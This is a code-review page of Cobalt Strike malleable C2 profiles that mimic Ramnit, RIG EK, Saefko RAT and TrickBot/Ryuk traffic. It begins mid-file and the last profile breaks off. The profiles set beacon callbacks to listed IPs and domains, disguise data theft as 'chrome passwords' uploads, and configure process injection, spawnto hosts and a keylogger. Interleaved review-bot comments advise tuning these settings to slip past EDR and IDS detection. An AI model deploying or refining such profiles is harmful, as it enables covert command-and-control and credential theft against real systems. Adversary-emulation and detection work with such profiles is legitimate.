95 | header "Cache-Control" "no-store, no-cache, must-revalidate, max-age=0"; | |
96 | header "Content-Encoding" "gzip"; | |
97 | ||
98 | ||
99 | output { | |
100 | netbios; | |
101 | print; | |
102 | } | |
103 | } | |
104 | } | |
105 | ||
106 | http-stager { | |
107 | ||
108 | set uri_x86 "/Jump/next.php"; | |
109 | set uri_x64 "/jump/Next.php"; | |
110 | ||
111 | client { | |
112 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
113 | header "Referer" "http://buzzadnetwork.com/jump/next.php?r=1566861&sub1="; | |
114 | header "Accept-Language" "en-US"; | |
115 | header "Accept-Encoding" "gzip, deflate"; | |
116 | header "Host" "www.buzzadnetwork.com"; | |
117 | header "Connection" "Keep-Alive"; | |
118 | } | |
119 | ||
120 | server { | |
121 | header "Server" "openresty"; | |
122 | header "Content-Type" "text/html; charset=utf-8"; | |
123 | header "Keep-Alive" "timeout=2, max=100"; | |
124 | header "Connection" "Keep-Alive"; | |
125 | header "Location" "http://xn--b1aanbboc3ad8jee4bff.xn--p1ai/redirect.php?acsc=93042904"; | |
126 | #has 2 r's in 'referrer' | |
127 | header "Referrer-Policy" "no-referrer"; | |
128 | header "Vary" "Accept-Encoding"; | |
129 | ||
130 | } | |
131 | ||
132 | ||
133 | } | |
134 | ||
135 | stage { | |
136 | #https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf | |
137 | set compile_time "09 Jan 2014 12:24:14"; | |
138 | set userwx "false"; | |
139 | set image_size_x86 "316224"; | |
140 | set image_size_x64 "616224"; | |
141 | ||
142 | transform-x86 { | |
143 | strrep "beacon.dll" "rmnsft.dll"; | |
144 | } | |
145 | ||
146 | transform-x64 { | |
147 | strrep "beacon.x64.dll" "RMNSFT.dll"; | |
148 | } | |
149 | ||
150 | #https://github.com/tbarabosch/quincy-complementary-material/blob/master/yara/ramnit.yara | |
151 | stringw "USERPASSCWD CDUPQUITPORTPASVTYPEMODERETRSTORAPPERESTRNFRRNTOABORDELERMD"; | |
152 | stringw "ModuleCode"; | |
153 | stringw "StartRoutine"; | |
154 | stringw "cookies.txt"; | |
155 | ||
156 | } |
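Review bot: In the http-post client block a static `header "Referer" "http://........../redirect.php?acsc=93042904";` coexists with an `id` block that also writes its value via `header "Referer";`, so the request ends up with two definitions of the same header and which one wins, or whether both are sent, depends on how the profile loader merges them — not visible in this hunk. Drop the static line, or add a comment explaining why both are needed. The `..........` in that value and in the `id` block's `prepend "http://........../redirect.php?acsc=";` reads like a host redacted in the source report, and a `# host redacted in the source report; the dots are emitted literally` comment should say so. The three commented-out `# header ...` lines in the same client block are dead configuration and should be removed or explained.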
0 | #rigEK | |
1 | #taken from --> http://www.malware-traffic-analysis.net/2018/01/30/index.html | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko)"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | ||
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/"; | |
15 | ||
16 | client { | |
17 | ||
18 | header "Accept" "text/html, */*"; | |
19 | header "Accept-Language" "en-US"; | |
20 | header "Host" "176.57.208.59"; | |
21 | header "Connection" "Keep-Alive"; | |
22 | ||
23 | ||
24 | ||
25 | metadata { | |
26 | netbios; | |
27 | append "FeJzPWAlzAFfZGVub21pbmF0aW9ucwSTKqgxlbbnLbhBk"; | |
28 | parameter "Mzk2MTw"; | |
29 | ||
30 | ||
31 | } | |
32 | ||
33 | parameter "GUaq" "OynNUEcKZTPj"; | |
34 | ||
35 | } | |
36 | ||
37 | server { | |
38 | ||
39 | header "Server" "nginx/1.6.2"; | |
40 | header "Content-Type" "text/html;charset=UTF-8"; | |
41 | header "Connection" "keep-alive"; | |
42 | header "Vary" "Accept-Encoding"; | |
43 | header "Content-Encoding" "gzip"; | |
44 | ||
45 | ||
46 | output { | |
47 | netbios; | |
48 | ||
49 | prepend "............[....0.<.Wx.a...=-...q..*.%(.. ..~.TFW..U z....))%...of.|.....$.52.....w...~....o..._.....w8.........z......m.[..e....j.9<n.._+..5.uVi.-........qC...V.]n..._..'.w..e............y..o......j..-bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd..w.............fu...WY......o8.=..YG..%....:1..... :(.~.......u..n9m..m.......V:m...3......j2....vM....zVv.u."; | |
50 | ||
51 | append "..EQk.....q.....1.t..pNjq...u...m.h..........z+....Z*X.r... | |
52 | ..*..N.z..8.1.m .y.F.1....U.. ......... | |
53 | ....Z'=..+..H...aI ..)..36J~..O.n.....J.....!=G...o._.....s!......-p.....+>........,.r......./......7|>.......2.5ad../.....-lj......N..T...x...9N.. | |
54 | .....N.a=..G..N... | |
55 | .V.L.\"..U.d.Y.....s.....H.|. .4e...(b.CLV....Z..x..^v...%bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd...K.).d.......j.~(.y.u+.._c*....S$p.R.).../[email protected]......"; | |
56 | ||
57 | print; | |
58 | ||
59 | ||
60 | } | |
61 | } | |
62 | } | |
63 | ||
64 | http-post { | |
65 | ||
66 | set uri "/gate.php"; | |
67 | ||
68 | client { | |
69 | ||
70 | header "Host" "doueven.click"; | |
71 | header "Connection" "close"; | |
72 | header "Accept-Language" "en-US"; | |
73 | header "Content-Type" "image/jpeg"; | |
74 | ||
75 | output { | |
76 | netbios; | |
77 | print; | |
78 | ||
79 | } | |
80 | ||
81 | ||
82 | id { | |
83 | netbios; | |
84 | header "Cookie"; | |
85 | ||
86 | } | |
87 | } | |
88 | ||
89 | server { | |
90 | ||
91 | header "Server" "Apache"; | |
92 | header "Upgrade" "h2,h2c"; | |
93 | header "Connection" "Upgrade, close"; | |
94 | header "Content-Type" "application/octet-stream"; | |
95 | ||
96 | ||
97 | output { | |
98 | netbios; | |
99 | prepend "IX."; | |
100 | prepend " "; | |
101 | prepend " "; | |
102 | ||
103 | print; | |
104 | } | |
105 | } | |
106 | } | |
107 | ||
108 | http-stager { | |
109 | ||
110 | set uri_x86 "/prink.exe"; | |
111 | set uri_x64 "/Prink.exe"; | |
112 | ||
113 | client { | |
114 | header "Host" "31.31.203.14"; | |
115 | header "Accept-Language" "en-us"; | |
116 | header "Accept" "text/html, application/xml, image/png, image/jpeg, image/gif, image/x-xbitmap"; | |
117 | header "Accept-Charset" "utf-8, utf-16, iso-8859-1"; | |
118 | header "Pragma" "non-cache"; | |
119 | header "Connection" "close"; | |
120 | } | |
121 | ||
122 | server { | |
123 | header "Server" "nginx/1.10.2"; | |
124 | header "Content-Type" "application/octet-stream"; | |
125 | header "Keep-Alive" "timeout=2, max=100"; | |
126 | header "Connection" "close"; | |
127 | header "ETag" "be339-de000-563c784ba5900"; | |
128 | header "Accept-Ranges" "bytes"; | |
129 | ||
130 | } | |
131 | ||
132 | ||
133 | } | |
134 | ||
135 | stage { | |
136 | ||
137 | set compile_time "28 Jan 2018 08:12:18"; | |
138 | set userwx "false"; | |
139 | set image_size_x86 "428544"; | |
140 | set image_size_x64 "428544"; | |
141 | ||
142 | ||
143 | } |
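Review bot: The `append` value in the http-get server output block is one quoted literal spanning five physical lines with raw line breaks, and it contains the token `[email protected]`, which looks like a rendering artifact of this page rather than the file's content — the raw file should be checked before relying on these bytes, and whether the profile parser accepts embedded newlines inside a quoted value is not something the hunk documents. A `# body taken from the sample and rendered as printable text; non-printable bytes appear as '.'` comment on the `prepend`/`append` pair would record the provenance the other profiles give in their headers. The Emotet http-get `prepend` in this commit shows the same multi-line literal and the same `[email protected]` token.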
0 | #saefko.profile | |
1 | #https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat | |
2 | #xx0hcd | |
3 | ||
4 | ###global options### | |
5 | set sleeptime "5000"; | |
6 | set jitter "33"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38"; | |
8 | ||
9 | set sample_name "saefko.profile"; | |
10 | ||
11 | http-get { | |
12 | ||
13 | set uri "/love/server.php"; | |
14 | ||
15 | set verb "GET"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Host" "acpananma.com"; | |
20 | ||
21 | ||
22 | metadata { | |
23 | base64url; | |
24 | parameter "pass"; | |
25 | } | |
26 | ||
27 | parameter "command" "UpdateHTTPIRCStatus"; | |
28 | parameter "machine_id" "202"; | |
29 | parameter "irc_status" "1"; | |
30 | ||
31 | } | |
32 | ||
33 | server { | |
34 | header "Server" "Apache"; | |
35 | header "X-Powered-By" "PHP/5.6.36"; | |
36 | header "Vary" "Accept-Encoding"; | |
37 | header "Content-Type" "text/html; charset=UTF-8"; | |
38 | ||
39 | output { | |
40 | ||
41 | netbios; | |
42 | ||
43 | prepend "ok\n"; | |
44 | prepend "2\n"; | |
45 | ||
46 | append "0\n"; | |
47 | ||
48 | print; | |
49 | } | |
50 | } | |
51 | } | |
52 | ||
53 | http-post { | |
54 | ||
55 | set uri "/Love/server.php"; | |
56 | #set verb "GET"; | |
57 | set verb "POST"; | |
58 | ||
59 | client { | |
60 | ||
61 | header "Content-Type" "application/x-www-form-urlencoded"; | |
62 | header "Host" "acpananma.com"; | |
63 | header "Expect" "100-continue"; | |
64 | header "Connection" "Keep-Alive"; | |
65 | ||
66 | ||
67 | output { | |
68 | base64url; | |
69 | parameter "command"; | |
70 | ||
71 | } | |
72 | ||
73 | id { | |
74 | base64url; | |
75 | parameter "pass"; | |
76 | ||
77 | } | |
78 | ||
79 | } | |
80 | ||
81 | server { | |
82 | header "Host" "acpananma.com"; | |
83 | ||
84 | output { | |
85 | netbios; | |
86 | ||
87 | prepend "\nHTTP/1.1 100 Continue\n\n"; | |
88 | ||
89 | #checked to make sure the misspells were misspelled, uh, correctly? | |
90 | append "irc_channel\":\"null\",\"irc_nickname\":\"jI87fg\",\"irc_password\":\"K8gtr$4\",\"irc_port\":\"6669\",\"irc_server\":\"Setting+up+IRC+service.\",\"machine_active_time\":\"12\",\"machine_artct\":\"x86\",\"machine_bitcoin_value\":\"0\",\"machine_business_value\":\"0\",\"machine_calls_activity\":\"0\",\"machine_camera_activity\":\"8\",\"machine_country_iso_code\":\"8864\",\"machine_creadit_card_posiblty\":\"0\",\"machine_current_time\":\"10:32:45\",\"machine_facebook_activity\":\"0\",\"machine_gaming_value\":\"0\",\"machine_gmail_avtivity\":\"0\",\"machine_googlepluse_activity\":\"0\",\"machine_instgram_activity\":\"0\",\"machine_ip\":\"10.1.23.146\",\"machine_lat\":\"0\",\"machine_lng\":\"eng\",\"machine_os_type\":\"win\",\"machine_register_date\":\"0222\",\"machine_screenshot\":\"1"; | |
91 | print; | |
92 | } | |
93 | } | |
94 | } | |
95 | ||
96 | http-stager { | |
97 | ||
98 | set uri_x86 "/clients2.google.com/generate_204"; | |
99 | set uri_x64 "/clients3.google.com/generate_204"; | |
100 | ||
101 | client { | |
102 | ||
103 | header "Host" "acpananma.com"; | |
104 | ||
105 | } | |
106 | ||
107 | server { | |
108 | header "Server" "Apache"; | |
109 | header "X-Powered-By" "PHP/5.6.36"; | |
110 | header "Vary" "Accept-Encoding"; | |
111 | header "Content-Type" "text/html; charset=UTF-8"; | |
112 | ||
113 | output{ | |
114 | prepend "ok\n"; | |
115 | prepend "2\n"; | |
116 | ||
117 | append "0\n"; | |
118 | print; | |
119 | } | |
120 | ||
121 | } | |
122 | ||
123 | ||
124 | } | |
125 | ||
126 | ||
127 | ||
128 | ||
129 | ###Malleable PE Options### | |
130 | ||
131 | post-ex { | |
132 | ||
133 | set spawnto_x86 "%windir%\\syswow64\\wscript.exe"; | |
134 | set spawnto_x64 "%windir%\\sysnative\\wscript.exe"; | |
135 | ||
136 | set obfuscate "false"; | |
137 | ||
138 | set smartinject "false"; | |
139 | ||
140 | set amsi_disable "false"; | |
141 | ||
142 | } | |
143 | ||
144 | #used peclone on sample from https://app.any.run/tasks/54fe7d78-91d9-4d45-8b65-7333c2c7d480/ | |
145 | stage { | |
146 | set checksum "0"; | |
147 | set compile_time "12 Feb 2019 14:33:03"; | |
148 | set entry_point "159022"; | |
149 | set image_size_x86 "548864"; | |
150 | set image_size_x64 "548864"; | |
151 | #set name ""; | |
152 | set userwx "false"; | |
153 | set cleanup "false"; | |
154 | set stomppe "false"; | |
155 | set obfuscate "false"; | |
156 | set rich_header ""; | |
157 | ||
158 | set sleep_mask "false"; | |
159 | ||
160 | # set module_x86 ""; | |
161 | # set module_x64 ""; | |
162 | ||
163 | transform-x86 { | |
164 | # prepend "\x90\x90\x90"; | |
165 | # strrep "ReflectiveLoader" "6ayBRVW"; | |
166 | # strrep "beacon.dll" "uVRWRut"; | |
167 | } | |
168 | ||
169 | transform-x64 { | |
170 | # prepend "\x90\x90\x90"; | |
171 | # strrep "ReflectiveLoader" "6ayBRVW"; | |
172 | # strrep "beacon.x64.dll" "uVRWRut"; | |
173 | } | |
174 | ||
175 | #can set a string in the .rdata section of the beacon dll. | |
176 | #adds a zero-terminated string | |
177 | #string "something"; | |
178 | ||
179 | #adds a string 'as-is' | |
180 | #data "something"; | |
181 | ||
182 | #adds a wide (UTF-16LE encoded) string | |
183 | #stringw "IMAGE_SCN_MEM_READ"; | |
184 | } | |
185 | ||
186 | ||
187 | #controls process injection behavior | |
188 | process-inject { | |
189 | ||
190 | # set allocator "NtMapViewOfSection"; | |
191 | ||
192 | # set min_alloc "16700"; | |
193 | ||
194 | set userwx "false"; | |
195 | ||
196 | set startrwx "true"; | |
197 | ||
198 | transform-x86 { | |
199 | # prepend "\x90\x90\x90"; | |
200 | } | |
201 | transform-x64 { | |
202 | # prepend "\x90\x90\x90"; | |
203 | } | |
204 | ||
205 | execute { | |
206 | # CreateThread "ntdll!RtlUserThreadStart"; | |
207 | CreateThread; | |
208 | NtQueueApcThread; | |
209 | CreateRemoteThread; | |
210 | RtlCreateUserThread; | |
211 | } | |
212 | } |
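Review bot: `set startrwx "true";` at 196 in the process-inject block makes every injected region start out RWX, which works against the `set userwx "false";` two lines above and differs from the `startrwx "false"` the trick_ryuk profile in this same set uses for the same block; unless the emulated sample is known to allocate RWX, `set startrwx "false";` is the safer default, since private RWX memory is one of the cheapest injection heuristics. The `spawnto_x86`/`spawnto_x64` targets at 133–134 are wscript.exe, and a script host started with no script argument and then injected into is itself a common detection, so a comment such as `# wscript.exe with no arguments is an easy spawnto tell; consider a host process that normally runs argument-less` would at least record the trade-off. The user agent at 7 claims `AppleWebKit/587.38`, which I do not recognise as a real WebKit build (shipping browsers report `537.36`); if it is not copied verbatim from the Zscaler capture it is a free signature and should be corrected.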
0 | #trick_ryuk.profile | |
1 | #for CS 4.2, if not then c2lint will not like it. | |
2 | #https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf | |
3 | #https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/ | |
4 | #xx0hcd | |
5 | ||
6 | ###Global Options### | |
7 | set sample_name "trick_ryuk.profile"; | |
8 | ||
9 | set sleeptime "5000"; | |
10 | set jitter "20"; | |
11 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; | |
12 | ||
13 | set host_stage "true"; | |
14 | ||
15 | ###DNS options### | |
16 | set dns_idle "8.8.8.8"; | |
17 | set maxdns "245"; | |
18 | set dns_sleep "0"; | |
19 | set dns_stager_prepend ""; | |
20 | set dns_stager_subhost ""; | |
21 | set dns_max_txt "252"; | |
22 | set dns_ttl "1"; | |
23 | ||
24 | ###SMB options### | |
25 | set pipename "ntsvcs##"; | |
26 | set pipename_stager "scerpc##"; | |
27 | ||
28 | ###TCP options### | |
29 | set tcp_port "8000"; | |
30 | ||
31 | ####SSH options### | |
32 | set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)"; | |
33 | set ssh_pipename "SearchTextHarvester##"; | |
34 | ||
35 | ###SSL Options### | |
36 | ||
37 | #https-certificate { | |
38 | #set keystore ""; | |
39 | #set password ""; | |
40 | #} | |
41 | ||
42 | #https-certificate { | |
43 | # set C "US"; | |
44 | # set CN "whatever.com"; | |
45 | # set L "California"; | |
46 | # set O "whatever LLC."; | |
47 | # set OU "local.org"; | |
48 | # set ST "CA"; | |
49 | # set validity "365"; | |
50 | #} | |
51 | ||
52 | #code-signer { | |
53 | #set keystore "your_keystore.jks"; | |
54 | #set password "your_password"; | |
55 | #set alias "server"; | |
56 | #} | |
57 | ||
58 | ###HTTP-Config Block### | |
59 | #http-config { | |
60 | # set headers "Server, Content-Type"; | |
61 | # header "Content-Type" "text/html;charset=UTF-8"; | |
62 | # header "Server" "nginx"; | |
63 | # | |
64 | # set trust_x_forwarded_for "false"; | |
65 | #} | |
66 | ||
67 | ###HTTP-GET Block### | |
68 | ||
69 | http-get { | |
70 | ||
71 | set uri "/dd05ce3a-a9c9-4018-8252-d579eed1e670.zip"; | |
72 | ||
73 | client { | |
74 | ||
75 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
76 | header "Accept-Language" "en-US"; | |
77 | header "Host" "23.95.97.59"; | |
78 | header "Connection" "Keep-Alive"; | |
79 | ||
80 | ||
81 | metadata { | |
82 | ||
83 | base64url; | |
84 | prepend "SESSIONID="; | |
85 | header "Cookie"; | |
86 | ||
87 | } | |
88 | ||
89 | } | |
90 | ||
91 | server { | |
92 | header "Server" "Apache"; | |
93 | header "Upgrade" "h2,h2c"; | |
94 | header "Connection" "Upgrade, Keep-Alive"; | |
95 | header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT"; | |
96 | header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\""; | |
97 | header "Accept-Ranges" "bytes"; | |
98 | header "Vary" "Accept-Encoding,User-Agent"; | |
99 | header "Keep-Alive" "timeout=5"; | |
100 | ||
101 | output { | |
102 | ||
103 | netbios; | |
104 | ||
105 | prepend "PK.........080..W.3 | |
106 | ...1.....InvoiceStatement.lnk.Z_.^G..m.j.....\".....f{... | |
107 | 7..464.v7.6M..b.o.m..&.M6. | |
108 | ....\"..E..|..P.(R%.J..A.....'..9g...L>....;..;3g........B..1S.. | |
109 | 3.........V....v.......|.....>"; | |
110 | ||
111 | append ".....achor_dns....."; | |
112 | ||
113 | print; | |
114 | } | |
115 | } | |
116 | } | |
117 | ||
118 | #HTTP-GET VARIANT | |
119 | http-get "get_ryuk" { | |
120 | ||
121 | set uri "/files"; | |
122 | ||
123 | client { | |
124 | ||
125 | metadata { | |
126 | ||
127 | base64url; | |
128 | prepend "SESSIONID="; | |
129 | header "Cookie"; | |
130 | ||
131 | } | |
132 | ||
133 | } | |
134 | ||
135 | server { | |
136 | ||
137 | output { | |
138 | ||
139 | netbios; | |
140 | ||
141 | prepend ""; | |
142 | ||
143 | append ""; | |
144 | ||
145 | print; | |
146 | } | |
147 | } | |
148 | } | |
149 | ||
150 | ###HTTP-POST VARIANT### | |
151 | ||
152 | http-post "post_ryuk" { | |
153 | ||
154 | set uri "/id"; | |
155 | set verb "GET"; | |
156 | ||
157 | client { | |
158 | ||
159 | output { | |
160 | netbios; | |
161 | parameter "1"; | |
162 | } | |
163 | id { | |
164 | base64url; | |
165 | parameter "id"; | |
166 | ||
167 | } | |
168 | } | |
169 | server { | |
170 | output { | |
171 | netbios; | |
172 | print; | |
173 | } | |
174 | } | |
175 | } | |
176 | ||
177 | ||
178 | ###HTTP-Post Block### | |
179 | ||
180 | http-post { | |
181 | ||
182 | set uri "/ono19/ADMIN-DESKTOP.AC3B679F4A22738281E6D7B0C5946E42/81/"; | |
183 | #set verb "GET"; | |
184 | set verb "POST"; | |
185 | ||
186 | client { | |
187 | ||
188 | header "Accept" "*/*"; | |
189 | #header "Host" ""; | |
190 | #header "Connection" "close"; | |
191 | header "Content-Type" "multipart/form-data; boundary=-----------KMOGEEQTLQTCQMYE"; | |
192 | ||
193 | ||
194 | output { | |
195 | netbios; | |
196 | #prepend "SESSIONID="; | |
197 | #header "COOKIE"; | |
198 | prepend "-----------KMOGEEQTLQTCQMYE | |
199 | Content-Disposition: form-data; name=\"data\" | |
200 | ||
201 | https://nytimes.com/|Admin|"; | |
202 | append "\n-----------KMOGEEQTLQTCQMYE | |
203 | Content-Disposition: form-data; name=\"source\" | |
204 | ||
205 | chrome passwords | |
206 | -----------KMOGEEQTLQTCQMYE--"; | |
207 | ||
208 | print; | |
209 | ||
210 | } | |
211 | ||
212 | id { | |
213 | base64url; | |
214 | parameter "id"; | |
215 | ||
216 | } | |
217 | } | |
218 | ||
219 | server { | |
220 | ||
221 | header "Connection" "close"; | |
222 | header "Server" "Cowboy"; | |
223 | header "Content-Type" "text/plain"; | |
224 | ||
225 | ||
226 | output { | |
227 | netbios; | |
228 | ||
229 | prepend "/1/\n"; | |
230 | ||
231 | append ""; | |
232 | ||
233 | print; | |
234 | } | |
235 | } | |
236 | } | |
237 | ||
238 | ###HTTP-Stager Block### | |
239 | http-stager { | |
240 | ||
241 | set uri_x86 "/dd05ce3a-a9c9-4018-8252-D579eed1e670.zip"; | |
242 | set uri_x64 "/Dd05ce3a-a9c9-4018-8252-d579eed1e670.zip"; | |
243 | ||
244 | client { | |
245 | ||
246 | header "Host" "51.254.25.115"; | |
247 | header "Connection" "Keep-Alive"; | |
248 | ||
249 | } | |
250 | ||
251 | server { | |
252 | ||
253 | header "Server" "Apache"; | |
254 | header "Upgrade" "h2,h2c"; | |
255 | header "Connection" "Upgrade, Keep-Alive"; | |
256 | header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT"; | |
257 | header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\""; | |
258 | header "Accept-Ranges" "bytes"; | |
259 | header "Vary" "Accept-Encoding,User-Agent"; | |
260 | header "Keep-Alive" "timeout=5"; | |
261 | ||
262 | output { | |
263 | ||
264 | print; | |
265 | } | |
266 | ||
267 | } | |
268 | } | |
269 | ||
270 | ||
271 | ###Malleable PE/Stage Block### | |
272 | ||
273 | #some options taken from -> https://otx.alienvault.com/indicator/file/7b9526f82448d0a1fb59a8125d1de55e3a166d72 | |
274 | stage { | |
275 | set checksum "0"; | |
276 | set compile_time "16 Apr 2020 17:56:00"; | |
277 | set entry_point "170000"; | |
278 | set image_size_x86 "383992"; | |
279 | set image_size_x64 "383992"; | |
280 | #set name "WWanMM.dll"; | |
281 | set userwx "false"; | |
282 | set cleanup "false"; | |
283 | set sleep_mask "false"; | |
284 | set stomppe "false"; | |
285 | set obfuscate "false"; | |
286 | set rich_header "bd8cf6bfbbaf89f44f2e0189ce41549f4d4c550a712cc5660619e4ac3b4adce9"; | |
287 | ||
288 | #new 4.2. options | |
289 | #set allocator "HeapAlloc"; | |
290 | #set magic_mx_x86 "MZRE"; | |
291 | #set magic_mz_x64 "MZAR"; | |
292 | #set magic_pe "PE"; | |
293 | ||
294 | set sleep_mask "false"; | |
295 | ||
296 | #set module_x86 "wwanmm.dll"; | |
297 | #set module_x64 "wwanmm.dll"; | |
298 | ||
299 | transform-x86 { | |
300 | #prepend "\x90\x90\x90"; | |
301 | strrep "ReflectiveLoader" ""; | |
302 | strrep "beacon.dll" ""; | |
303 | } | |
304 | ||
305 | transform-x64 { | |
306 | #prepend "\x90\x90\x90"; | |
307 | strrep "ReflectiveLoader" ""; | |
308 | strrep "beacon.x64.dll" ""; | |
309 | } | |
310 | ||
311 | string ",Control_RunDLL \x00"; | |
312 | string "start program with cmdline \"%s"; | |
313 | string "Global\\fde345tyhoVGYHUJKIOuy"; | |
314 | string "get command: incode %s, cmdid \"%s\", cmd \"%s "; | |
315 | string "anchorDNS"; | |
316 | string "Anchor_x86"; | |
317 | string "Anchor_x64"; | |
318 | string "{43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00}"; | |
319 | string "{6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00}"; | |
320 | string "checkip.amazonaws.com"; | |
321 | string "wtfismyip.com"; | |
322 | string "{83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}"; | |
323 | string "{48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}"; | |
324 | string ":\\Anchor\\Win32\\Release\\Anchor_"; | |
325 | ||
326 | } | |
327 | ||
328 | ###Process Inject Block### | |
329 | process-inject { | |
330 | ||
331 | #set allocator "NtMapViewOfSection"; | |
332 | ||
333 | set min_alloc "16700"; | |
334 | ||
335 | set userwx "false"; | |
336 | ||
337 | set startrwx "false"; | |
338 | ||
339 | transform-x86 { | |
340 | #prepend "\x90\x90\x90"; | |
341 | } | |
342 | transform-x64 { | |
343 | #prepend "\x90\x90\x90"; | |
344 | } | |
345 | ||
346 | execute { | |
347 | CreateThread; | |
348 | CreateRemoteThread; | |
349 | ||
350 | CreateThread "ntdll.dll!RtlUserThreadStart+0x1000"; | |
351 | ||
352 | SetThreadContext; | |
353 | ||
354 | NtQueueApcThread-s; | |
355 | ||
356 | #NtQueueApcThread; | |
357 | ||
358 | CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000"; | |
359 | ||
360 | RtlCreateUserThread; | |
361 | } | |
362 | } | |
363 | ||
364 | ###Post-Ex Block### | |
365 | post-ex { | |
366 | ||
367 | set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; | |
368 | set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; | |
369 | ||
370 | set obfuscate "false"; | |
371 | ||
372 | set smartinject "false"; | |
373 | ||
374 | set amsi_disable "false"; | |
375 | ||
376 | #new 4.2 options | |
377 | set thread_hint "ntdll.dll!RtlUserThreadStart"; | |
378 | set pipename "DserNamePipe##"; | |
379 | set keylogger "SetWindowsHookEx"; | |
380 | ||
381 | } |
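Review bot: `set rich_header "bd8cf6…adce9";` at 286 is a 64-hex-character string that looks like a SHA-256 digest rather than the raw Rich header bytes the option expects (peclone emits them as an escaped byte string), so as written the stage would presumably carry that ASCII text instead of a cloned Rich header; paste the peclone output or drop the line. `set sleep_mask "false";` appears at both 283 and 294, and the commented option at 290 is spelled `magic_mx_x86` where 291 uses `magic_mz_x64`, so the duplicate can go and the typo would likely be rejected by c2lint the moment it is uncommented. `set host_stage "true";` at 13 serves the stager payload unauthenticated to anyone who requests the URIs at 241–242; for a profile meant to blend in, `set host_stage "false";` with stageless payloads is the usual hardening. The `Host` values at 77 (`23.95.97.59`) and 246 (`51.254.25.115`) are bare IP literals that presumably come from the referenced reports' indicators, and a Host header that names a published IoC and does not match the address actually contacted is exactly what proxies and IDS rules key on, so they should be set per engagement.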
0 | #trickbot | |
1 | #https://community.rsa.com/community/products/netwitness/blog/2017/07/13/necurs-delivers | |
2 | #https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/ | |
3 | #xx0hcd | |
4 | ||
5 | ||
6 | set sleeptime "30000"; | |
7 | set jitter "20"; | |
8 | set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"; | |
9 | set dns_idle "8.8.8.8"; | |
10 | set maxdns "235"; | |
11 | ||
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Host" "203.150.19.63:443"; | |
20 | header "Connection" "Keep-Alive"; | |
21 | header "Cache-Control" "no-cache"; | |
22 | ||
23 | ||
24 | metadata { | |
25 | base64url; | |
26 | prepend "D007="; | |
27 | header "Cookie"; | |
28 | ||
29 | ||
30 | } | |
31 | ||
32 | } | |
33 | ||
34 | server { | |
35 | ||
36 | header "Server" "nginx"; | |
37 | header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; | |
38 | header "Content-Type" "text/html"; | |
39 | header "Connection" "keep-alive"; | |
40 | ||
41 | ||
42 | output { | |
43 | base64url; | |
44 | prepend "<html> | |
45 | <head><title>404 Not Found</title></head> | |
46 | <body bgcolor='white'> | |
47 | <center><h1>404 Not Found</h1></center> | |
48 | <hr><center>nginx</center> | |
49 | </body> | |
50 | </html> | |
51 | <!CDATA['="; | |
52 | append "']> | |
53 | </html>"; | |
54 | print; | |
55 | } | |
56 | } | |
57 | } | |
58 | ||
59 | http-post { | |
60 | ||
61 | set uri "/response.php"; | |
62 | ||
63 | client { | |
64 | ||
65 | header "Content-Type" "multipart/form-data; boundary=----ZMZTCR"; | |
66 | ||
67 | output { | |
68 | netbios; | |
69 | prepend "----ZMZTCR | |
70 | Content-Disposition: form-data;name='sourcelink' "; | |
71 | ||
72 | append " Content-Disposition: form-data;name='sourcequery' | |
73 | ----ZMZTCR"; | |
74 | print; | |
75 | ||
76 | ||
77 | ||
78 | } | |
79 | ||
80 | ||
81 | id { | |
82 | base64url; | |
83 | header "Cookie"; | |
84 | ||
85 | ||
86 | } | |
87 | } | |
88 | ||
89 | server { | |
90 | ||
91 | header "Server" "nginx"; | |
92 | header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; | |
93 | header "Content-Type" "text/html; charset=utf-8"; | |
94 | header "Connection" "keep-alive"; | |
95 | ||
96 | ||
97 | output { | |
98 | base64; | |
99 | print; | |
100 | } | |
101 | } | |
102 | } | |
103 | ||
104 | http-stager { | |
105 | server { | |
